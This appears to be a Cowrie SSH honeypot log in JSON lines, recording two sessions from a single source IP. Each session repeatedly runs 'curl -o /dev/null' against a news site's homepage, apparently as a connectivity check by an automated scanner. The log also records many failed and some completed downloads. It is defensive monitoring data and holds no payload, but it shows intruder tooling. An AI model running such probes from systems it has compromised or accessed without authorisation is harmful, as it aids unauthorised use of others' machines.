{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.214085Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.242832Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.261292Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.282938Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.342777Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.343745Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.345975Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.347035Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.360782Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.376383Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.410234Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.411968Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.417052Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.449150Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.450779Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.455174Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.458053Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.459854Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.461215Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.494035Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.495901Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.499654Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.500624Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.506125Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.507832Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.559579Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.561490Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.569458Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.570805Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.573340Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.574332Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.589974Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.607047Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.607758Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.609137Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.620615Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.644900Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.666291Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.667375Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.671300Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.672334Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.683843Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.684865Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.704031Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.705144Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.714514Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.715672Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.785740Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.863549Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.873272Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.874422Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.879412Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.880439Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.915828Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.916943Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.919818Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.920808Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.922437Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.923319Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.959362Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.960493Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.963121Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.964073Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.977282Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.978428Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.996235Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.997310Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.000332Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.001317Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.032004Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.033938Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.073492Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.075108Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.080979Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.082180Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.084329Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.085093Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.120633Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.122113Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.138906Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.139912Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.144631Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.145532Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.194254Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.195798Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.236015Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.237189Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.243067Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.244079Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.248775Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.250379Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.289323Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.292613Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.293402Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.298586Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.299660Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.336822Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.337995Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.364971Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.367115Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.374347Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.375269Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.388373Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.391162Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.404930Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.406711Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.422306Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.423415Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.436553Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.438002Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.439502Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.461232Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.462079Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.463705Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.474001Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.474927Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.479244Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.503460Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.504646Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.509627Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.510545Z","src_ip":"212.227.125.160","session":"7541ed730449"}
